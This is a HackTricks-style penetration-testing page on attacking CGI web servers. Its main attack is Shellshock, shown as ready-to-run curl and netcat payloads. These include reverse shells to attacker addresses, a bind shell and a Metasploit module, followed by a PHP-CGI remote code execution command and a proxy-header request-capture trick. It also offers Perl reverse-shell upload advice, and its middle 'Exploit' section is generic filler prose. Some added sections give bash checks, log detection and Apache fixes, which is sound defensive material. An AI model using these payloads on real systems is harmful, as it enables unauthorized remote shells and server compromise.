hacktricks/network-services-pentesting/pentesting-web/cgi.md
2023-08-03 19:12:22 +00:00


☁️ HackTricks Cloud ☁️ - 🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Information

CGI scripts are Perl scripts, so if you have compromised a server that can execute _.cgi_ scripts you can upload a Perl reverse shell (/usr/share/webshells/perl/perl-reverse-shell.pl), change the extension from **.pl to .cgi**, give it execute permissions (chmod +x) and request it from the web browser to run the reverse shell. To test for CGI vulnerabilities it is recommended to use nikto -C all (and all the plugins).

ShellShock

Bash can also be used to run commands passed to it by applications, and it is this feature that is affected by the vulnerability. One type of command that can be sent to Bash allows environment variables to be set. Environment variables are dynamic, named values that affect the way processes run on a computer. The vulnerability lies in the fact that an attacker can append malicious code to the environment variable's value, and that code is run as soon as the variable is received.

When this vulnerability is exploited, the page may throw an error.

You can discover this vulnerability by noticing that the server uses an old version of Apache and cgi_mod (with a cgi folder), or by using nikto.
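A defender-side way to confirm the mechanism described above is to check the local bash itself rather than a web server. The following is an added example (not from the original page): it exports a variable whose value looks like a function definition with trailing code and checks whether bash runs that code (the CVE-2014-6271 behaviour). The marker string and function name are my own choices.

```shell
# Added example (not from the original page): does the local bash still execute
# code that trails an exported function definition (CVE-2014-6271)?
# Prints "vulnerable", "patched" or "no-bash".
check_shellshock() {
    if ! command -v bash >/dev/null 2>&1; then
        echo "no-bash"
        return 0
    fi
    # The value is shaped like an exported function. A fixed bash stops parsing
    # after the closing "}"; a vulnerable one also runs 'echo SHELLSHOCK_MARKER'.
    out=$(env x='() { :; }; echo SHELLSHOCK_MARKER' bash -c 'echo probe' 2>/dev/null)
    case "$out" in
        *SHELLSHOCK_MARKER*) echo "vulnerable" ;;
        *)                   echo "patched" ;;
    esac
    return 0
}

check_shellshock
```

Run it on every host that serves CGI content; a result of "vulnerable" means the bash package needs updating regardless of whether any web test has succeeded yet.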

Test

Most tests are based on echoing something and expecting that string to be returned in the web response. If you think a page may be vulnerable, search for all the cgi pages and test them.

Nmap

nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi

Curl (reflected, blind and out-of-band)

Reflected

The reflected test appends a command whose output is easy to recognise (an echo of a marker string) to the function-definition prefix in a request header. If the CGI script is handled by a vulnerable bash, the marker appears in the HTTP response, so a grep on the response is enough to decide. This is the quickest test when the script's output reaches the client.

Blind

When the command output never reaches the response (it is discarded, or the command runs after the headers have been sent), execution can still be inferred from a side effect: a sleep that delays the response by a measurable amount, or a ping or web request to a host you control that you watch with tcpdump. Compare the timing against an unmodified request so that network jitter is not mistaken for a positive.

Out-of-Band

The out-of-band variant makes the injected command open a connection back to a listener you control, so the result is observed on that channel instead of in the response. Any header that the web server turns into an environment variable will do; Cookie is a common alternative when User-Agent is filtered or normalised.

Mitigation

All three variants rely on the same bug, so the fix is the same: update bash to a build that ignores trailing code after an imported function definition (CVE-2014-6271 and its follow-ups). Until that is done, strip or normalise request headers before they reach CGI scripts and watch the access log for the "() {" prefix.
# Reflected
curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE'
# Blind with sleep (you could also make a ping or web request to yourself and monitor that with tcpdump)
curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://10.11.2.12/cgi-bin/admin.cgi
# Out-Of-Band Use Cookie as alternative to User-Agent
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh
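The same header prefix that the curl tests above send is what a defender should look for in the web server's access log. The following is an added example (not from the original page): it embeds a few constructed Apache combined-format log lines, counts the requests that carry a function-definition prefix in a logged header, and lists the source addresses. The log lines, addresses and function names are constructed for the example.

```shell
# Added example (not from the original page): find Shellshock probes in an
# Apache combined-format access log. The probe's "() {" prefix lands in the
# Referer/User-Agent fields that the combined format writes out.
SAMPLE_LOG=$(mktemp)
cat >"$SAMPLE_LOG" <<'EOF'
192.0.2.10 - - [03/Aug/2023:19:12:22 +0000] "GET /cgi-bin/admin.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.11 - - [03/Aug/2023:19:12:25 +0000] "GET /cgi-bin/admin.cgi HTTP/1.1" 200 38 "-" "() { :; }; echo VULNERABLE"
192.0.2.12 - - [03/Aug/2023:19:12:31 +0000] "HEAD /cgi-bin/status HTTP/1.1" 200 - "-" "() { :;}; /bin/bash -c \"sleep 5\""
192.0.2.13 - - [03/Aug/2023:19:13:02 +0000] "GET /index.html HTTP/1.1" 200 1204 "http://example.invalid/" "curl/7.88.1"
EOF

# Number of log lines containing a function-definition prefix. The pattern
# tolerates the spacing variants seen in the wild: "() {", "(){", "() {:;}".
shellshock_hits() {
    grep -c '()[[:space:]]*{' "$1"
}

# Distinct source addresses of those lines, for blocking or triage.
shellshock_sources() {
    grep '()[[:space:]]*{' "$1" | awk '{print $1}' | sort -u
}

shellshock_hits "$SAMPLE_LOG"      # 2
shellshock_sources "$SAMPLE_LOG"
```

Headers such as Cookie are not written by the combined format, so a probe sent only in Cookie (as in the out-of-band curl above) will not show up here; log those headers explicitly (for example with a custom LogFormat) if CGI is exposed.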

Shellshocker

python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi

Exploit

Exploiting vulnerabilities in CGI scripts is a common technique used in web application penetration testing. CGI (Common Gateway Interface) is a protocol that allows web servers to execute scripts and generate dynamic content. By exploiting vulnerabilities in CGI scripts, an attacker can gain unauthorized access to the server or execute arbitrary code.

Remote Command Execution

Remote Command Execution (RCE) is a type of vulnerability that allows an attacker to execute arbitrary commands on the target server. In the context of CGI scripts, RCE vulnerabilities can be exploited by injecting malicious commands into user input fields or by manipulating the parameters passed to the script.

To exploit an RCE vulnerability in a CGI script, an attacker needs to identify the input fields or parameters that are vulnerable to command injection. Once identified, the attacker can craft a payload that includes the malicious command and submit it to the server. If the vulnerability is successfully exploited, the server will execute the injected command and return the output to the attacker.

File Inclusion

File Inclusion vulnerabilities occur when a CGI script includes external files without proper validation. This can allow an attacker to include arbitrary files from the server's file system, potentially exposing sensitive information or executing malicious code.

To exploit a File Inclusion vulnerability in a CGI script, an attacker needs to identify the vulnerable inclusion point and provide a path to the file they want to include. This can be done by manipulating the parameters passed to the script or by exploiting other vulnerabilities to gain control over the file inclusion process.

Once the File Inclusion vulnerability is successfully exploited, the attacker can read sensitive files, such as configuration files or user credentials, or execute arbitrary code by including a malicious file.

Directory Traversal

Directory Traversal vulnerabilities occur when a CGI script does not properly sanitize user input, allowing an attacker to navigate outside of the intended directory structure and access files or directories that should be restricted.

To exploit a Directory Traversal vulnerability in a CGI script, an attacker needs to identify the input fields or parameters that are vulnerable to directory traversal attacks. By manipulating these inputs, the attacker can navigate to directories outside of the intended scope and access sensitive files or directories.

Once the Directory Traversal vulnerability is successfully exploited, the attacker can read or modify files, upload malicious files, or gain unauthorized access to restricted areas of the server.

Code Injection

Code Injection vulnerabilities occur when a CGI script does not properly validate or sanitize user input, allowing an attacker to inject and execute arbitrary code on the server.

To exploit a Code Injection vulnerability in a CGI script, an attacker needs to identify the input fields or parameters that are vulnerable to code injection. By injecting malicious code into these inputs, the attacker can trick the server into executing the injected code.

Once the Code Injection vulnerability is successfully exploited, the attacker can execute arbitrary commands, gain unauthorized access to the server, or perform other malicious activities.

Conclusion

Exploiting vulnerabilities in CGI scripts can provide attackers with unauthorized access to servers or the ability to execute arbitrary code. It is important for web application developers and administrators to properly validate and sanitize user input to prevent these types of vulnerabilities. Regular security assessments and penetration testing can help identify and mitigate these risks.

#Bind Shell
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80
#Reverse shell
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.159.1 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80
#Reverse shell using curl
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' http://10.1.2.11/cgi-bin/admin.cgi
#Reverse shell using metasploit
> use multi/http/apache_mod_cgi_bash_env_exec
> set targeturi /cgi-bin/admin.cgi
> set rhosts 10.1.2.11
> run

Proxy (MitM on web server requests)

CGI creates an environment variable for each header of the HTTP request. For example, "host:web.com" is created as "HTTP_HOST"="web.com".

Since the web server may use the HTTP_PROXY variable, try to send a header containing "Proxy: <IP_attacker>:<PORT>". If the server performs any request during the session, you will be able to capture each request the server makes.
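On the defending side, the header-to-variable mapping above means the server should never let a client-supplied Proxy header reach a CGI environment. The following Apache configuration fragment is an added example (not from the original page); it assumes mod_headers and mod_setenvif are loaded, and the log file name is my own choice.

```apache
# Added example (not from the original page): stop the client's "Proxy" header
# from becoming HTTP_PROXY in the CGI environment. "early" runs the rule before
# the request is handed to the CGI handler.
RequestHeader unset Proxy early

# Keep a record of requests that arrived with the header, for detection.
# The log path is a placeholder chosen for this example.
SetEnvIf Proxy .+ httpoxy_probe
CustomLog logs/httpoxy_probes.log combined env=httpoxy_probe
```

Stripping the header at the server is the reliable fix because it covers every CGI script at once; the scripts themselves can additionally ignore HTTP_PROXY, but that has to be done in each one.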

Old PHP + CGI = RCE (CVE-2012-1823, CVE-2012-2311)

Basically, if CGI is active and PHP is "old" (<5.3.12 / <5.4.2), you can execute code. To exploit this vulnerability you need to access some PHP file of the web server without sending parameters (specifically, without sending the character "="). Then, to test for the vulnerability, you could access for example /index.php?-s (note the -s) and the source code of the application will appear in the response.

Then, to obtain RCE, you can send this special query: /?-d allow_url_include=1 -d auto_prepend_file=php://input, with the PHP code to execute in the body of the request. Example:

curl -i --data-binary "<?php system(\"cat /flag.txt \") ?>" "http://jh2i.com:50008/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"

More information about the vulnerability and possible exploits: https://www.zero-day.cz/database/337/, cve-2012-1823, cve-2012-2311, CTF Writeup Example.
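The query-string shape described above (a leading "-" and no "=") is also what a defender can filter on while PHP is being upgraded. The following Apache rewrite rule is an added example (not from the original page): it reproduces, from memory, the workaround the PHP project published alongside the advisory, so verify it against that advisory before relying on it. It assumes mod_rewrite is enabled; the real fix is to update PHP or to run it through mod_php or FastCGI, which are not affected by this bug in the CGI SAPI.

```apache
# Added example (not from the original page): drop query strings that would be
# parsed as php-cgi command-line options (CVE-2012-1823). A query beginning with
# "-" (or its URL-encoded form %2d) and containing no "=" is rewritten to an
# empty query string, so "-s" and "-d" never reach php-cgi.
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
RewriteRule ^(.*) $1? [L]
```

After applying it, the /index.php?-s probe from the section above should return the page normally rather than its source, which doubles as a quick check that the rule is in effect.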
